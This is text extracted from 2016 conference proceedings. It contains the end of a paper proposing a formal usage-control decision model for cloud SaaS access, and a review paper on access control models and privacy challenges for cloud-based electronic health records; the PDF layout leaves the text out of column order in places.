Subject Attribute (ATT (Sub)):
Subject attributes include all abilities
and features that define the unique
subject such as id, role and name.
They can be used for usage definition
system.
Object (Obj): Object is a member of
the resource set that subject can access

ISBN: 978-1-941968-37-6 2016 SDIWC

The Authentication function (Ae) authenticates


subject before the access. It has the following
elements: Sub, ATT (Sub), Obj, ATT (Obj),
IObjR, And a Boolean function Ae.
Authentication function checks whether Sub
can access the objects or not. For example, the
user sends a login request to the server. The
login process will be successful if the user is
authenticated. Privacy rights are exceptions in
this function.

108

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Ae (ATT(Sub), ATT(Obj), IObjR)


Permitted Access (Sub , Obj)

=>
(1)

Figure 4. Ao Function

Figure 3. Ae Function

Where P => Q means P is a necessary condition


for Q. The predicate shows subject that has the
initial object right, can grant access permission if
Ae for Sub is true.

2.2 Authorization Function


The Authorization function (Ao) authorizes the
subject during the access. It has the following
elements: Sub, ATT(Sub), Obj, ATT(Obj),
ObjR and a boolean function Ao. Right
permission will be examined by Ao during the
usage. For example, suppose a user is reading a
web page after a successful login process.
During the web page usage, user authorization
will be checked and the access will be
terminated if the administrator cancels the
permission of Sub. Exception of this function is
privacy rights.
Permitted Access (Sub, Obj) => true

(2)

(2) is a prerequisite of Authorization on Obj for


Sub.
Access Terminated (Sub, Obj)
(ATT(Sub), ATT(Obj), IObjR))

=>

2.3 Requirement Function


Requirement Function (Re) defines all
prerequisite actions of right and they have to
check before and during the access. The Re
function examines obligations fulfillment
before accessing and it named pre obligation.
An example of Re is start online business. The
prerequisites include: filling up membership
form, sign license of e-commerce by users and
accept the license by website administrator. Re
function has the following components:
Sub, ATT(Sub), Obj, ATT(Obj) and Re
Boolean function. Re checks whether
obligations are fulfilled before access or not.
Re decision function:
Subject Requirement Object Requirement ->
(5)
{True, False}
(Re (Sub, Obj)
Obj)

=> Permitted Access (Sub,


(6)

(Ae
(3)

(Ao
(ATT(Sub),
ATT(Obj),
ObjR))
=>Permitted Right Request (Sub, Obj, ObjR)
(4)

ISBN: 978-1-941968-37-6 2016 SDIWC

Ao are checked for continued access based on


events or periodic. If the attributes are not
satisfied then the access will be terminated.

Figure 5: Re Function

109

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Re function sometimes perform on different


objects and can be done by other subjects. All
requirements have to be true before Subject
access Object.
2.4 Obligation Function

Access will be terminated if the subject


obligations do not fulfill during the usage.
Request: Usage Request (Sub, Obj,
ObjR)
Response: Permission.xml
Authentication Logic:

Obligations fulfill during the usage after


specific events or periodically with time period
defined by the administrator. As an example, ebanking needs user authorization and
communication every 30 seconds on client side.
Thus, obligations have to fulfill by user in
every 30 second time period. The Obligation
function (Ob) has the following components:
Sub, ATT(Sub), Obj, ATT(Obj), ObjR and Ob
as a Boolean function. Ob checks obligation
fulfillment during the usage.
Ob function:
Subject Obligation Object Obligation
Object Right Obligation -> {True, False}
(7)
Permitted Access (Sub, Obj) => true

(8)

If Re is failed then it does not need further


verification.
Access Terminated (Sub, Obj) => (Re (Sub,
Obj))
(9)
(Ob (Sub, Obj, ObjR) => Permitted Right
Request (Sub, Obj, ObjR)
(10)

Figure 6. Ob Function

ISBN: 978-1-941968-37-6 2016 SDIWC

// Ae Function
(1) If (Ae (ATT(Sub), ATT(Obj), IObjR)
= False)
// Subject Authentication is not
successful.
a. Access Terminate
(2) End if
// Ao (check based on events or
periodic)
(3) If (Ae (ATT(Sub), ATT(Obj), IobjR)
= False)
// Subject Authentication is not
successful.
a. Access Terminate
(4) Else
a. If (Ao (ATT(Sub), ATT(Obj),
ObjR) = False)
//Subject Authorization is not
successful.
i. Right Request Terminate
b. End if
(5) End if
// Re Function
(6) If (Re (Sub, Obj) = False)
// Requirement is not fulfilled
a. Access Terminate
(7) End if
// Ob (check based on events or
periodic)
(8) If (Re (Sub, Obj) = False)
// Requirement is not fulfilled
a. Access Terminate
(9) Else
a. If (Ob (Sub, Obj, ObjR) =
False)
// Obligation is not fulfilled.
i. Right Request Terminate
b. End if
(10) End if
Right request permit

110

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

The above four functions need to combin for


final Authentication Logic as shown in
Figure 7.

also during usage. We have analyzed decision


factors for usage control system through four
functions. Authentication function controls
access requests and Requirement function
checks the prerequisites before the usage.
Furthermore, decision making during the usage
are done based on Authorization and Obligation
functions. Right requests are considered by
authorization, and obligation fulfillment is
checked by obligation. Future works, may
include validating and applying the logic on
real world case studies in different cloud
computing like education systems, health and
medical systems.
REFERENCES

Figure 7. Cloud Computing Authentication Logic

[1]

B. Furht, "Cloud computing fundamentals,"


Handbook of Cloud Computing, pp. 3-19, 2010.

[2]

Jadhav, C. M., et al. "An Approach for Development


of Multitenant Application as SaaS Cloud."
International Journal of Computer Applications
106.14 (2014).

[3]

S. Subashini and V. Kavitha, "A survey on security


issues in service delivery models of cloud
computing," Journal of Network and Computer
Applications, vol. 34, pp. 1-11, 2011.

[4]

R. Smith, "Computing in the cloud," Research


Technology Management, vol. 52, p. 65, 2009.

[5]

J. Heiser, "What you need to know about cloud


computing security and compliance," Gartner,
Research, ID, 2009.

[6]

Tan, Chekfoung, Kecheng Liu, and Lily Sun. "A


design of evaluation method for SaaS in cloud
computing." Journal of Industrial Engineering and
Management 6.1 (2013): 50.

[7]

A. Jasti, P. Shah, R. Nagaraj, and R. Pendse,


"Security in multi-tenancy cloud," in Security
Technology (ICCST), 2010 IEEE International
Carnahan Conference on, 2010, pp. 35-41.

[8]

H. Raj, R. Nathuji, A. Singh, and P. England,


"Resource management for isolation enhanced cloud
services," in Proceedings of the 2009 ACM
workshop on Cloud computing security, 2009, pp.
77-84.

[9]

D. Zissis and D. Lekkas, "Addressing cloud


computing security issues," Future Generation
Computer Systems, vol. 28, pp. 583-592, 2012.

3 Conclusion and Future Work


Ambiguity of data location and multi-tenancy
are the main features of cloud computing. They
are causing numerous data access issues and
several works developed to solve these
problems. Previous works have been extended
by our proposed model in the ongoing
continuity for access control and defined with
formal statement. The formal statements can be
used in various types of cloud computing
services and desired properties can be checked
in all types of cloud. Indeed, it can be modified
and adapted to different needs, by changing the
formulas for each case through assigning new
appropriate parameters.
Therefore, the objectives of this work are to
propose a reusable and flexible usage decision
model. In this paper, we have proposed a new
usage decision model for cloud computing in
saas layer. Data and services are protected from
unauthorized access not only at login time but

ISBN: 978-1-941968-37-6 2016 SDIWC

111

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

[10]

Tarigonda, Siva, A. Ganesh, and Srinivasulu Asadi.


"Providing Data Security in Cloud Computing using
Novel and Mixed Agent based Approach."
International Journal of Computer Applications
112.6 (2015).

[11]

Chhabra, Shruti, and Veer Sain Dixit. "Cloud


computing: State of the art and security issues."
ACM SIGSOFT Software Engineering Notes 40.2
(2015): 1-11.

[12]

M. Zalewski, "Browser security handbook," Google


Code, 2010.

[24]

Z. Zhang, L. Yang, Q. Pei, and J. Ma, "Research on


Usage Control model with delegation characteristics
based on OM-AM methodology," in Network and
Parallel Computing Workshops, 2007. NPC
Workshops. IFIP International Conference on, 2007,
pp. 238-243.

[25]

M. Sastry and R. Krishnan, "A new modeling


paradigm for dynamic authorization in multi-domain
systems," Computer Network Security, pp. 153-158,
2007.

[26]

X. Luo, Y. Yang, and Z. Hu, "Controllable


delegation
model
based
on
usage
and
trustworthiness," in Knowledge Acquisition and
Modeling, 2008. KAM '08. International Symposium
on, 2008, pp. 745-749.

[13]

D. Fox, "Open Web Application Security Project,"


Datenschutz und Datensicherheit-DuD, vol. 30, pp.
636-636, 2006.

[14]

W. T. Tsai, Z. Jin, and X. Bai, "Internetware


computing: issues and perspective," in Proceedings
of the First Asia-Pacific Symposium on
Internetware, 2009, p. 1.

[27]

A. Pretschner, M. Hilty, F. Schutz, C. Schaefer, and


T. Walter, "Usage control enforcement: Present and
future," Security & Privacy, IEEE, vol. 6, pp. 44-53,
2008.

[15]

S. De Capitani di Vimercati, S. Paraboschi, and P.


Samarati, "Access control: principles and solutions,"
Software: Practice and Experience, vol. 33, pp. 397421, 2003.

[28]

M. Blaze, J. Feigenbaum, J. Ioannidis, and A.


Keromytis, "The role of trust management in
distributed systems security," Secure Internet
Programming, pp. 185-210, 1999.

[16]

Ye, Xinfeng. "Privacy preserving and delegated


access control for cloud applications." Tsinghua
Science and Technology 21.1 (2016): 40-54.

[29]

K. D. Bowers, A. Juels, and A.


high-availability and integrity
storage," in Proceedings of
conference on Computer and
security, 2009, pp. 187-198.

[17]

J. Park and R. Sandhu, "Towards usage control


models: beyond traditional access control," 2002, pp.
57-64.

[30]

K. Hamlen, M. Kantarcioglu, L. Khan, and B.


Thuraisingham, "Security issues for cloud
computing," International Journal of Information
Security and Privacy (IJISP), vol. 4, pp. 36-48, 2010.

[31]

Rajkumar, P. V., and Ravi Sandhu. "Safety


Decidability for Pre-Authorization Usage Control
with Finite Attribute Domains.", IEEE Transactions
on Dependable and Secure Computing, 2015.

[18]

J. Park, "Usage control: a unified framework for next


generation access control," George Mason
University, 2003.

[19]

J. Park and R. Sandhu, "The UCON ABC usage


control model," ACM Transactions on Information
and System Security (TISSEC), vol. 7, pp. 128-174,
2004.

[20]

A. Lazouski, F. Martinelli, and P. Mori, "Usage


control in computer security: A survey," Computer
Science Review, vol. 4, pp. 81-99, 2010.

[21]

Shahpasand, Maryam, et al. "Usage Decision Model


for Online Social Network." Advanced Computer
Science Applications and Technologies (ACSAT),
2012 International Conference on. IEEE, 2012.

[22]

Jun, Ma, et al. "EUCON: An Active Usage Control


Model." Energy Procedia 13 (2011): 1450-1457.

[23]

M. Hilty, A. Pretschner, C. Schaefer, and T. Walter,


"Enforcement for Usage Control: A System Model
and a Policy Language for Distributed Usage
Control," Technical Report I-ST-20, DoCoMo
EuroLabs2006.

ISBN: 978-1-941968-37-6 2016 SDIWC

Oprea, "HAIL: a
layer for cloud
the 16th ACM
communications

112

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Privacy and Security Challenges in Cloud Based Electronic Health Record:


Towards Access Control Model
Micheal Kubbo1, Manoj Jayabalan2, Muhammad Ehsan Rana3
School of Computing, Asia Pacific University of Technology and Innovation
Technology Park Malaysia, Bukit Jalil - 57000 Kuala Lumpur, Malaysia
[email protected], [email protected], [email protected]

ABSTRACT
Over the years, data theft has been rampant in
financial institutions, however at present medical
data is in the spotlight. Healthcare industry is
considered as a potential target for hackers and cyber
criminals for accessing patients data. Electronic
Health Record (EHR) provide flexibility, timely
access and interoperability of patient information
which is key in decision making by physicians and
medical officers. With the advancement of
technology, cloud has been spotted as a solution for
healthcare practitioners to implement interconnected
EHR as it reduces cost and hassle of infrastructure
maintenance. Cloud platform allows data to be
replicated in different geographical locations and
retrieved and shared among various organizations in
a timely manner. Healthcare sector is facing a
dilemma on how patients information can be
protected while it is being managed by cloud
vendors. Several cloud-based EHR apply
cryptographic techniques to encrypt data at rest/data
in motion and access control to eliminate
unauthorized access. As a result, existing access
control mechanisms in cloud mainly focuses on
giving data access to physicians and other medical
officers but overlooks privacy requirements of
patients. This research discusses various access
control models, their merits, limitations, and roles to
promote privacy in cloud based solutions.

KEYWORDS
Access Control, Electronic Health Records, Privacy,
Security, Cloud Platform.

ISBN: 978-1-941968-37-6 2016 SDIWC

1 INTRODUCTION
Electronic Health Records (EHR) assist
healthcare organizations towards fast and better
delivery of services and treatment to patients [1]
According to technology report, it is clearly
indicated that Malaysia healthcare industries
gradually adopting to EHR technology,
however, paper-based records are also still in use
[2]. Paper based records cannot be completely
eliminated in healthcare however it can be
reduced to a certain magnitude [3]. Due to
advancement in technology, healthcare
organizations have started to integrate several IT
systems to facilitate interoperability however
privacy still remains a very big concern for
healthcare consumers [4].
Advancement in technology has opened avenues
for the healthcare sector. Consequently, cloud
computing has been recognized as a costeffective technique for small healthcare
providers due to the eradication of IT
infrastructure to be individual managed. Attracts
EHR to be deployed in the cloud and
harmoniously be managed by cloud vendors [5].
Recent study highlights that 60 percent of
independent physicians have resorted to
adopting the use of EHR due to costs incurred in
the implementation of a cloud-based EHR is
profoundly low as compared to a decentralized
EHR system.

113

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Some of the benefits identified in using cloudbased solutions include affordability, no


contracts, availability, and interoperability
among others. However, since the cloud
platform is driven by cloud vendors, healthcare
organizations should be able to devise a risk
management program in the cloud to illuminate
and guarantee security and privacy of the
information [6]. Similarly, as the cloud is
exposed to vulnerabilities, security controls, risk
assessment programs, security requirements and
practices should be adopted by healthcare
providers to promote total visibility to EHR
consumers. Data security and privacy has a
higher risk associated with the cloud which leads
to a dilemma for some healthcare organizations
that wishes to transfer their services to the cloud.
Protecting patients medical data is an utmost
priority for any type of healthcare organization
ensuring the information available only to
authorized users. One primary way to secure
data and leverage privacy in the cloud is through
the use of an access control mechanism since the
highest percentage of security breaches are due
to unauthorized access [5].

unclear towards consumers as a result of


prevailing breaches thus lowering the trust of the
systems [4]. In this research, three categories of
security challenges have been identified and
included: - Human factors, Law and Ethics, CIA
Protection.

This research provides an overview of the


various access control mechanisms available for
EHR providers, their strength, and weakness.
Next, a discussion on privacy and security issues
in EHR and cloud is further presented limited to
access control. Cryptography is an important
factor which needs to consider in cloud-based
EHR. With respect to the cloud, access control
models are further discussed.

According to an exploratory study conducted in


the US regarding third party access to medical
records, it is argued that government should a
times be mandated to override patients privacy
policies and rules regarding disclosure of their
medical records to third-party companies. This
is because, in the case of a disease outbreak, the
government is supposed to coordinate with these
research agencies to make sure that these issues
are dealt with in the best possible way without
affecting the privacy of patients thus improving
the quality of healthcare delivery [14].

2 PRIVACY AND SECURITY


CHALLENGES IN ELECTRONIC
HEALTH RECORD
Security of healthcare information commences
with the protection of patients personal medical
records by guaranteeing that privacy,
confidentiality, and Integrity of the EHR system
is maintained at all times [12]. Technology
advancement is rapid as never before however
the aspect of privacy concerns in EHR remain

ISBN: 978-1-941968-37-6 2016 SDIWC

2.1 Human Factors


According to a study conducted by KTH
university research students in Sweden over
physicians, it was identified that around 76% of
them considered human factor as the ultimate
challenge in EHR implementation whereas 53%
had little or no interest in Health IT [13].
Therefore, EHR systems have a higher
probability of being successfully implemented if
the usability study is carried out beforehand
adopting to the healthcare environment.
Secondly, sufficient training of staff on the EHR
usage and the need for patients privacy
requirements has to be addressed.
2.2 Law and Ethics

Although a number of rules and regulations both


at the state and federal level have been
established to protect patients privacy for
instance:
HIPAA,
Health
Information
Technology for Economics and Clinical Health
(HITECH) to leverage implementation of health
IT infrastructure, privacy preservation of
patients data is still questionable [15].

114

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

2.3 Confidentiality, Integrity and Availability


(CIA) Protection

EHR. These operations are performed by


physicians who are in a hurry thus causing data
integrity issues [10].
2.3.3 Availability

As healthcare organization transform paper


charts into computerized records through the use
of EHR system, security breaches will always be
a concern as this compromises the integrity and
confidentiality of the health records [16]. As a
result, generic requirements for EHR systems
have been provided by International directives
such as HIPAA, European Data Protection and
requires EHR implementation to satisfy the CIA
Traid [17]. Below is the definition of CIA in
EHR security requirements [18].

The system should be able to be accessed


anytime when required by authorized parties and
entities for example in the case of any
emergency situation and a specific physician
needs access to patients record to carry out
diagnosis and approve medication to a patient.
The systems should not be constrained to a
specific time of the day otherwise; the
physicians job will be made complex since
decisions cant be made in real-time as required
[15].

2.3.1 Confidentiality
This refers to the ability to safeguard
information in the EHR system so that it can
only be accessed by authorized subjects.
Typically, authorized subjects will gain access
based on the predefined role-based privileges
[10]. Therefore, no information about patients
should be released without their consent unless
otherwise as stated by privacy rule.
Authorization is mainly carried out by a security
mechanism called an access control. It is a
greater challenge for healthcare organizations
since the medical data in the cloud based EHR is
stored in cloud vendor centers which are usually
distributed around several regions.
2.3.2 Integrity
Integrity can be understood as preserving the
initial representation of data even in the case of
any alterations [20]. Ensuring integrity is key in
EHR systems since it guarantees the accuracy of
data thus minimizing errors and improving the
safety of patients. Currently, authorized users
can also participate greatly in creating
inaccuracies if inadequately trained on the use of
the system, for instance, the use of cut and paste
feature, drop down menus have been reported as
one of the main cause of data inaccuracies in

ISBN: 978-1-941968-37-6 2016 SDIWC

3 TRADITIONAL ACCESS CONTROL IN


ELECTRONIC HEALTH RECORDS
Information access control is considered as top
most requirement for any healthcare
organization implementing EHR in the cloud.
Protecting patients data and organizations
resources from unauthorized disclosure while
ensuring CIA triad is essential under any
circumstances [21]. Bill et.al [18] argues that for
organizations to achieve these aspects, adoption
of an appropriate access control mechanism is
obligatory to enforce security and privacy
protection over companys resources.
A wide variety of traditional access control
methods have been implemented by various
organizations depending on their structure.
Below subsections discuss the different access
controls.
3.1 Discretionary Access Control (DAC)
Trusted Computer System Evaluation Criteria
(TCSEC) [21] defines this model as a
mechanism that restricts access to an object
basing on identity attached to the subject or a
group it belongs. In DAC, subjects can inherit
and transfer access rights to each other unless

115

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

otherwise if the restriction is enforced by


mandatory access control.
One sole advantage of using DAC is that
resource owners can specify and manage who
can access particular resources, however, the
access control design seems less secure
compared to MAC. Granting and revoking of
permission is achieved through use of Access
Control Lists (ACL) or identity-based access
control [2], [21]. This kind of access control
design is implemented mostly in the commercial
operating system currently in use for example
Windows based OS and Unix [22].
EHR systems essentially hold data composed of
thousands of clinical documents, these
documents have various attributes like author,
holder, patients and therefore identifying the
owner of the document amidst these variables
may be cumbersome. And not a suitable model
for a dynamic domain like healthcare [12].
3.2 Mandatory Access Control (MAC)
Mandatory Access Control (MAC) is looked at
as a solution for government systems that hold
very sensitive information with label normally
defined as Top-secret (Highest), Secret,
confidential and Unclassified (lowest) [2]. The
access control model is managed by a
centralized authority that grants access decisions
to the subjects requesting particular resources
normally referred to as objects [22].
MAC is generally more secure compared to the
DAC and also follows the paradigm of using
labels tagged with information to restrict object
access by subjects. To illustrate the point,
suppose a particular object is classified as
confidential, only the subjects holding clearance
level confidential can be able to access the
specific object otherwise access is denied. To
differentiate MAC from DAC, objects have to be
identified and checked to ascertain whether they
are associated with ACLs. MAC normally

ISBN: 978-1-941968-37-6 2016 SDIWC

provides a high level of trustworthiness through


the use security levels referred to as subject
clearances. Therefore, an access class will be
assigned to particular subjects and objects by the
MAC, that will secure how the information
flows.
The model has been reported as rigid since it
does not take into account dynamic and contextaware constraint for example; location, time,
device among other constraints [12]. Secondly,
MAC poses a greater challenge to implement in
an environment with decentralized systems. In a
nutshell, the model is expensive to implement
and fails to support some important principles
for instance; separation of duties, inheritance,
and least privilege.
3.3 Role-Based Access Control (RBAC)
RBAC came into existence in early 1970 when
system administrators started having data
security issues and challenges as the information
system started to serve multiple users along with
heterogeneous applications [23]. RBAC
provides a natural mechanism to control
resources in an organization which has led to
popularity gain and adoption by various
organizations [21]. The system administrator
will create roles that are linked by subjects
function, grant access rights to the roles,
thereafter assigning the users to the roles with
their responsibilities. [17] identifies three
aspects that should be emphasized while dealing
with this access control model.
Role assignment - A transaction can only be
executed by a subject if and only if, a role has
been assigned or selected, this aspect allows fine
grain access to the specific resource by
authorized subjects. Take an example if Mike
has been assigned as role Doctor then, he is
only allowed to access resources and act on them
within that scope.
Role authorization - This simply allows users to
only take up roles that they have been

116

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

authorized, thus maintaining integrity however


for DAC subjects can inherit privileges which
can lead to privacy and confidentiality violation.
Transaction authorization - A transaction can
only be carried out by an authorized subject with
an active role. This aspect is considered as the
basis on which an RBAC system operates.

NIST provides an advanced definition of ABAC


as an access control method where subjects
requesting to carry out operations on the objects
are evaluated basing on their own attributes,
object attributes and policies that have been
defined on the attributes and conditions.
Therefore, the result of the evaluation is either a
grant or deny access.

Resources in an information system need to be


protected, these system resources are in terms of
objects that are stored in the operating system or
a database management system [23]. Examples
of objects include files, directories, rows, tables,
columns to mention a few. RBAC objects do
possess permissions which are assigned to roles.
The model has a central component role
relations which comprises of user assignment
and permission assignment.

Next, ABAC utilizes a similar concept of policy


management reflected in ACL or RBAC.
However, in this case, policies can be evaluated
based on more than one attribute [25].
Implementations have been made to achieve
ABAC with the use of RBAC, although
compliance requirements have always been the
case. This is because RBAC extends a high level
of abstraction which makes a demonstration of
requirements a costly and complex task.

RBAC can be tailored to suit the changing needs


of the organization, this is one key benefit of
adopting this model. Secondly, it supports most
fundamental security principle that include:
Data abstraction: Abstraction allows the
establishment of abstract permissions for
example from an account object like credit or
debit. Therefore, the RBAC eliminates use of
typical permission provided by the operating
system that includes: (read, write, execute)
Separation of Duty: This principle is equally
important in RBAC security, this allows
mutually exclusive roles to be invoked to
complete sensitive tasks. For example it will
require the role of a doctor and laboratory
technician to diagnose a patient and prescribe
drugs.
3.4 Attribute-Based Access Control (ABAC)
To fully understand how ABAC works, basic
knowledge on how logical access control
mechanism works is key. ABAC operates on
logics to protect objects, data, applications and
other forms of resources and services [25].

ISBN: 978-1-941968-37-6 2016 SDIWC

In a healthcare setting, when a physician gets


employed in the hospital, he will be assigned a
set of attributes for example Jaya is Nurse
practitioner in the cardiology department. She
will be assigned permission to the resources that
can be invoked by her role. Authorized parties
assigned to policies that have to be evaluated
before access to any record is granted for
instance: Medical records for heart patients can
only be viewed and edited by nurse attached to
the cardiology department. As a result, Object
owners (patients) will create these policies once
regarding who can have to access these medical
records.
ABAC provides flexibility in such a way that
suppose subjects from other hospitals need to
access the specific object, they will be assigned
attributes rather than roles thus making it easier
for both objects owners and other authorities.
ABAC provides total flexibility for EHR
internal and external users, however since
external parties are assigned access to objects
without prior knowledge of patients, this
eventually raises accountability issues which are

117

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

an important factor and requirement from


international derivatives.
4. DISCUSSION
To answer questions regarding how to eliminate
unauthorized access in healthcare, different
access control mechanisms have been developed
and proposed to be applied depending on the
organization and their privacy needs [21]. MAC
as one of the model that is suitable for military
and government organization, Secondly, DAC is
constrained with strict access to resources by
authorized subjects thus not a flexible and fit for
healthcare organization where flexibility and
scalability is a necessity [12].
RBAC deals with the complexity of roles and
constraints using SOD principle which can also
be expressed as relationship based role [23].
For flexibility in access control decisions based
on user attributes and other environment
constraints, ABAC might be the appropriate
model [25].
Some of the previously proposed models on
extending RBAC and ABAC are discussed in
this section to find its applicability in cloud
adopted EHR. Traditional access control models
[12] that mainly utilize access control lists and
roles are not suitable for cloud deployment since
they are rigid and cannot meet dynamic numbers
of users involved in cloud deployments. Cloud
require fine grained access control that can
protect the confidentiality of outsourced data.
Trust context-aware access control model
proposed [27] to utilize trust level to
acknowledge and verify the requestor of a
particular resource. With trust computing
employed, permissions are dynamically adjusted
depending on the user behavior and the
associated environment. Therefore, a predictive
nature of authorization based on context
information and trust level of the requesting
subject will allow efficient resource sharing,

ISBN: 978-1-941968-37-6 2016 SDIWC

however, the model does not support privacy


policy. Similarly, semantic role-based access
control model [28] allows collaboration among
heterogeneous platforms of an organization. The
proposed model is generic and can be applied in
any enterprise to allow run-time dynamic
management and execution of access rights.
Similarly, suppose the user roles change, this
doesnt affect its operations, same as access
model proposed by [27], though this model
utilizes XACML architecture and roles are based
on OWL ontology. To leverage trust in cloud, a
trusted access control model [29] that extends
RBAC and task-based access control model, this
incorporates a reputation awarding mechanism,
that credits the user according to trust generated
over time as per user behavior, the AC model
seems to provide information security on the
data however fails to address calculation of
specific reputation value that reduces the
accuracy level.
ABAC [30]- [31] defines a flexible access
control model that allows attributes to be
associated with users on the systems, this access
control model defers a lot from RBAC in a way
that attributed values are used as determinants
for either denying or granting access to objects.
Additionally, Nitin and Anupam [32] claims that
ABAC model was designed to overcome
shortcomings addressed by classical access
models like (DAC, MAC, and RBAC) and also
leverage security and information sharing. This
includes the manual development of RBAC
policies that are costly and difficult [33]
compared to ABAC policies. Although
combining various access control seem
inconvenient, Lawrence and Jim [34] argues that
in order to keep security levels optimal, MAC
can be integrated with ABAC to leverage
flexibility in access control decisions vis--vis
other security attributes that may include subject
property, clearance or classification.
Study in [35] extends traditional ABAC to
support attribute rules that are used for decisions
and roles are assigned depending on attributes
that are linked to tasks which hold permissions.
As cloud adoption dominates enterprises,

118

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

various authors have proposed mechanism to


protect cloud data [36] that is based on
encryption of attributes, this model employs a
key policy attribute encryption scheme where
key generation and decryption is outsourced to
trusted authority. Moreover, with computational
tasks being executed over mobile and sensors,
the number of attributes will increase in the
access policy, as a result, a typical AttributeBased Encryption (ABE) will not be in a position
to retain its performance thus creating a
computational overhead.
Nevertheless, cryptographic access control [37]
mechanism to facilitate authorization in the
semi-trusted environment. The work is
expanded based on [36], with an inclusion of a
mediated revocation protocol component to
address computation overheads identified in
ABE. As the cloud is gaining massive attention
by enterprise for adoption, temporal access
control model [38] for cloud data with user
revocation, the solution is not so different from
other researchers [36], [37], [39], [40] since all
utilize the technique of CBE to protect the data
outsourced. However, this proposed model
provides an additional component that allows
decryption of the data over a specified period of
time by only the authorized subjects with user
revocation capabilities. Similarly, an extended
access control model [40] uses Cipher Text
Policy Comparative Attribute-Based Encryption
on top of ABAC thereby supporting wildcards
and negative attributes. This framework
provides efficiency since constant-size keys and
ciphertexts are generated irrespective of the
attributes involved thus providing a constant
computational cost on lightweight mobile
devices.
4.1 Limitations in Cloud Based Models
Various mechanisms to restrict access and
protect resources in the cloud have been
proposed in these articles [24],[27],[29],[37],
[39]-[40]. However, they fail to address security
and privacy requirements for EHR conformance

ISBN: 978-1-941968-37-6 2016 SDIWC

in the cloud, one of the most prevailing


requirement as per HIPPA in access control is
patients consent [42]. A hybrid cloud-based
EHR system design was proposed in [42] which
takes into account privacy and security
requirement for example encryption of data at
rest and in motion, notification of data owner on
every access to patients information, ultimate
confidentiality, availability and access to records
during an emergency situation. However, this
design has not been implemented and its
feasibility has not yet been established.
Additionally, traditional models disregard
patients from having access to their medical
records as an exchange of medical records are
also too complex [23]- [25], [42]. Some cloud
EHR providers in the USA has demonstrated
conformance to HIPAA requirements, patients
have been granted a right to access a portion of
their medical records as identified in privacy
rule. However the issues of total visibility and
accountability on who and how medical records
are accessed is generally still questionable.
5. CONCLUSION
Privacy and security are amongst the most
challenging issues that are being faced by
healthcare industry. These issues are mostly
addressed by utilizing access control and
cryptographic techniques. Patients need for
privacy is vital for EHR success. As a result,
various authors have proposed access control
models to deal with privacy related issues. A
review of existing access control models reveals
that most work presented in literature extend
RBAC in order to provide flexibility and
security, however do not address access control
model requirements for instance a patient
service to allow patient consent. As a result,
trustworthiness between patients and EHR
system can be improved by incorporating
patient consent as an integral EHR component.
In Nutshell, to better address the need of
patients privacy in the presence of security
issues on cloud platform, a novel cloud privacy-

119

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

centric access control model should be proposed


and designed.

[18]

[19]

REFERENCES
[1]

[2]

[3]

[4]

[5]
[6]
[7]

[8]
[9]
[10]

[11]

[12]

[13]
[14]

[15]

[16]

[17]

Hoerbst, A. & Ammenwerth, E., 2010."Electronic


Health Records - A Systematic Review on Quality
Requirements," Methods Inf Med, Schattauer,
Volume 4, pp. 1-16.
Tech Review, M., 2006."EMR-Health Technology
assessment unit," Medical Development Division,
Kuala Lumpur: Ministry of Health.
Jurgen, S., Priv, D., Dietrich, K. J. I. & Dr Rer, N. M.
B., 2003. "Comparing Paper based with Electronic
patients Records: Lessons Learned during a Study on
Diagnosis and Procedure Codes," Journal of the
American Medical Informatics Association, 10(5),
pp. 2-8.
Jibin, J. & Vivek, A., 2010."Privacy in Electronic
Helath Records Systems - Consumer's perspective,
s.l.: Stockholm University.
M. Lamar, "EHRS in the Cloud," Journal of AHIMA,
vol. 82, no. 7, pp. 48-49, 2011.
E. Brian, "HIT Think How to manage risk with cloud
vendors," Health Data Management, 2016.
M. Maslin and R. Ailar, "Cloud Computing Adoption
in Healthcare Sector: A SWOT Analysis," Canadian
Center of Science and Education, vol. 11, no. 10, pp.
12-18, 2015
BitGlass, "Healthcare Breach Report 2016," BitGlass
Inc., 2016.
ClickCare, 2014."Healthcare BYOD and HIPAA
Security," San Jose: ClickCare LLC.
Edward, H. S., 1999. "The Evolution of Electronic
Medical Records". Academic Medicine, 74(4), pp.
414-419.
Ronald, B., John, S. & Robert, K., 2015. "New
challenges for Electronic Health Records
Confidentiality and Access to Sensitive Health
Information About Parents and Adolescents," The
Journal of the American Medical Association, 313(1),
pp. 29-30.
Ajit, A. & Eric, M. J., 2010." Information security and
privacy in healthcare: Current state of Research," Int.
J. Internet and Enterprise Management, 6(4), pp. 279313.
Experian,"Third Annual Data Breach Industry
Forecast," Experian Inc., 2016.
S. Chris and M. Christopher,"Healthcare's IoT
Dilemma: Connected Medical Devices," Forrester
Research Inc., 2016.
Sicuranza, M. & Ciampi, M., 2014."A sematic Access
Control for easy management of privacy for EHR
Systems,"IEEE-Advancing
Technology
for
Humanity, pp. 400-405.
unim, B. & Rachid, O. A.-E. B., 2008."As a human
factor, the attitude of healthcare practitioners is the
primary step for the e-healthFirst outcome of an
ongoing study in Morocco," Communications of the
IBIMA, Volume 3.
Patients GP and hospital data to be linked to help
plan services", Clinical Pharmacist, 2013.

ISBN: 978-1-941968-37-6 2016 SDIWC

[20]

[21]

[22]

[23]

[24]

[25]

[26]

[27]

[28]

[29]

[30]

[31]

[32]

[33]

[34]

[35]

Ferreira, A., Cruz, C. R. & Antunes, L., 2011.


"Usability of authentication and access control: a case
study in healthcare," Journal of Informatics
